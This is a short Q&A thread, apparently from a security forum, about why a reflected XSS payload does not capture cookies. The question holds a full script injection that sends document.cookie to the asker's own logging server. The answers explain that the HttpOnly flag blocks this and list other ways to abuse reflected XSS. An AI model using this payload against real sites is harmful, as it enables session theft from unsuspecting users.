1

I just found a website with a XSS vulnerability. When I visit the following URL, a pop up occurs:

https://example.com/article/HALLOWEEN"><script>alert(1);</script>

I have a cookielogger.php on my server with this code, so that when I visit myserver.com/key.php, a line is added to myserver.com/log.txt like this:

IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST:  | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD:  | REF:  | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:

But when I modify my URL to this one below, the cookie is not logged to my server

https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>
Anders
  • 64,406
  • 24
  • 178
  • 215
Yosua Kristanto
  • 11
  • 1
  • 2
  • 3
    Are the cookies you want to fetch flagged `HttpOnly`? – Arminius Sep 21 '18 at 19:49
  • without knowing the actual site I obviously can't test it, but you may want to look at the characters present in the second request not in the first. First off, the spaces and the unencoded '+' sign. I wouldn't be surprised if this was causing the server to truncate the request. – Angelo Schilling Sep 21 '18 at 19:52
  • *"Yes, it flagged httpOnly."* Then you can't read it via JavaScript, unless you can find somewhere on a page where it is printed. – Alexander O'Mara Sep 21 '18 at 20:08
  • 1
    Alexander : so, what are the impacts of reflected xss if the cookie is flagged httpOnly ? – Yosua Kristanto Sep 22 '18 at 02:00
  • 2
    @YosuaKristanto as far as stealing cookies, it's not effective anymore – multithr3at3d Sep 23 '18 at 16:33

1 Answers1

1

If document.cookie is empty, it is likely these cookies are set with the HttpOnly flag. This means you cannot access the cookies through JavaScript.

You shall have to reside to other methods in which reflected XSS may be abused, like open redirects, content injection, website defacing, et cetera.

Wouter
  • 397
  • 1
  • 12